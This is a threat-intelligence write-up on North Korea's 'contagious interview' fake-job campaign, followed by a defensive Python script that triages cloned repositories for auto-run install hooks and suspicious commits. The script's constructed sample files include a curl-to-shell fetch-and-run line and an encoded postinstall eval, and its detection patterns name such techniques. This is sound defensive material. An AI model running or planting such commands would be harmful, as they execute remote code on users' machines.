North Korean Fake Job Scams Spread Malware via 'Contagious Interview'
North Korean operatives use a 'contagious interview' tactic, where a compromised developer's GitHub repo spreads RATs to other job seekers.

Executive Summary
North Korean state-sponsored hackers are deploying a self-propagating social engineering campaign dubbed the 'contagious interview,' which uses a compromised developer's GitHub repository to infect other job seekers with remote access Trojans (RATs). According to researchers at Securonix, the Lazarus Group lures cryptocurrency and tech professionals with fake job offers, then weaponizes their own code to attack subsequent candidates, creating a worm-like infection chain.
Technical Analysis
The attack begins with a phishing email containing a malicious link, often disguised as a legitimate coding challenge or interview task hosted on a platform like GitHub. If a victim interacts with the repository, for example by cloning it and running a provided script, malware is deployed. The primary payload is a remote access Trojan, such as RustBucket or KandyKorn, which establishes a backdoor. Crucially, the threat actors then compromise the victim's own GitHub account and repositories. They inject malicious code into the victim's projects, which are then presented as 'tests' to the next round of job applicants, automatically propagating the infection.
Tactics, Techniques & Procedures
The campaign employs several distinct techniques. Initial access is gained through spear-phishing (T1566) targeting professionals in the crypto and tech sectors. The attackers use fake identities and company personas to build credibility. After compromise, they abuse version control systems (T1199) by modifying a victim's GitHub repositories to host malicious payloads. Execution is achieved through user execution of malicious scripts (T1204). The self-propagating mechanism, where one victim's resources are used to attack the next, represents a software supply chain attack (T1195.002) and demonstrates a worm-like capability for lateral movement within a specific professional community.
Threat Actor Context
The activity is attributed to the Lazarus Group, a cyber espionage and financial crime unit operated by North Korea's Reconnaissance General Bureau. The group is known for high-value cryptocurrency thefts to fund the regime. This 'contagious interview' tactic represents an evolution of their social engineering playbook, moving beyond one-off compromises to create a sustainable, automated infection pipeline that reduces their direct involvement and leverages victims' trusted reputations.
Mitigations & Recommendations
Securonix recommends that organizations, particularly those in cryptocurrency and technology, train employees and contractors to scrutinize unsolicited job interviews and technical tests. Developers should verify the integrity of any code repository before executing anything in it, even if it appears to come from a known contact. Enforcing multi-factor authentication on all version control and development platform accounts can prevent account takeover. Security teams should monitor for unusual repository commits and for the execution of unknown binaries from development environments.
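As an added example (not Securonix's tooling or code from the campaign write-up), the following Python script applies two of those recommendations to a cloned "coding challenge" repository before anything in it is run: it flags package-manager lifecycle hooks that execute automatically on install and script bodies that fetch and run remote content or evaluate encoded strings, and it lists commits whose author address is not a known maintainer. The package.json, source files, git-log lines and maintainer list are constructed for the self-check; the base64 string in the sample only decodes to console.log(1).

```python
"""Pre-execution triage for a cloned 'coding challenge' repository.

Added example, not tooling from Securonix or the article. Assumes a plain
checkout on disk; the constructed samples at the bottom let it self-check.
"""
import json
import re
import sys
from pathlib import Path

# npm runs these script names on its own during `npm install`.
AUTO_RUN_NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Heuristics for script bodies that a legitimate take-home test has no reason to contain.
RISKY_PATTERNS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b", "pipes downloaded content into a shell"),
    (r"\beval\s*\(", "evaluates code built at runtime"),
    (r"\bnew\s+Function\s*\(", "constructs code from strings"),
    (r"\bchild_process\b", "spawns subprocesses"),
    (r"https?://\d{1,3}(\.\d{1,3}){3}", "contacts a raw IP address"),
    (r"\bbase64\b|\bfromCharCode\b|\\x[0-9a-f]{2}", "uses encoded or obfuscated strings"),
]

SOURCE_SUFFIXES = (".js", ".ts", ".mjs", ".py", ".sh")


def scan_text(text):
    """Return the reasons from RISKY_PATTERNS that match the text, in table order."""
    return [reason for pattern, reason in RISKY_PATTERNS
            if re.search(pattern, text, re.IGNORECASE)]


def scan_package_json(raw):
    """Return (location, reason) findings for npm scripts; auto-run hooks are always reported."""
    try:
        scripts = json.loads(raw).get("scripts", {})
    except (json.JSONDecodeError, AttributeError):
        return [("scripts", "package.json could not be parsed")]
    findings = []
    for name, body in scripts.items():
        if name in AUTO_RUN_NPM_HOOKS:
            findings.append((f"scripts.{name}", "runs automatically on install"))
        findings.extend((f"scripts.{name}", reason) for reason in scan_text(str(body)))
    return findings


def scan_files(files):
    """files maps relative path -> text. Returns (path, location, reason) findings."""
    findings = []
    for path, text in files.items():
        name = Path(path).name
        if name == "package.json":
            findings.extend((path, loc, reason) for loc, reason in scan_package_json(text))
            continue
        if name == "setup.py":
            findings.append((path, "-", "executes arbitrary Python on 'pip install'"))
        if name in ("setup.py", "Makefile") or name.endswith(SOURCE_SUFFIXES):
            findings.extend((path, "-", reason) for reason in scan_text(text))
    return findings


def scan_repo(root):
    """Read every file under root (skipping .git) and hand the set to scan_files."""
    root = Path(root)
    files = {}
    for p in root.rglob("*"):
        rel = p.relative_to(root)
        if p.is_file() and ".git" not in rel.parts:
            files[str(rel)] = p.read_text(errors="ignore")
    return scan_files(files)


def unexpected_commits(log_lines, trusted_emails):
    """log_lines are `git log --format='%h %ae %s'` lines; returns commits by unknown authors.
    A takeover of the owner's account can commit under the owner's address, so an
    empty result is a prompt to review content, not proof the history is clean."""
    trusted = {e.lower() for e in trusted_emails}
    flagged = []
    for line in log_lines:
        parts = line.split(maxsplit=2)
        if len(parts) >= 2 and parts[1].lower() not in trusted:
            flagged.append((parts[0], parts[1], parts[2] if len(parts) == 3 else ""))
    return flagged


# Constructed samples: the base64 payload below only decodes to console.log(1).
SAMPLE_FILES = {
    "package.json": """{
  "name": "coding-challenge",
  "scripts": {
    "test": "jest",
    "postinstall": "node -e \\"eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())\\""
  }
}""",
    "src/index.js": "module.exports = (a, b) => a + b;\n",
    "setup.sh": "curl -s http://203.0.113.5/x | sh\n",
}
SAMPLE_GIT_LOG = [
    "a1b2c3d dev@example.com Add README and starter tests",
    "b2c3d4e dev@example.com Refactor parser",
    "c3d4e5f recruiter-tools@example.net Update package.json scripts",
]
TRUSTED_MAINTAINERS = {"dev@example.com"}

if __name__ == "__main__":
    # With a path argument, scan a real checkout; otherwise run on the constructed samples.
    findings = scan_repo(sys.argv[1]) if len(sys.argv) > 1 else scan_files(SAMPLE_FILES)
    for path, loc, reason in findings:
        print(f"{path} [{loc}]: {reason}")
    for sha, email, subject in unexpected_commits(SAMPLE_GIT_LOG, TRUSTED_MAINTAINERS):
        print(f"commit {sha} by unknown author {email}: {subject}")
```

Run it as `python triage.py path/to/checkout` after a plain `git clone`, before any `npm install`, `pip install` or `make`, since those are exactly the steps that fire the hooks it reports. The regex table is a review aid rather than a verdict: a hit means a human reads that script before it runs, and a clean result on a repository received through an unsolicited interview still does not replace checking with the supposed sender through a channel you already trust.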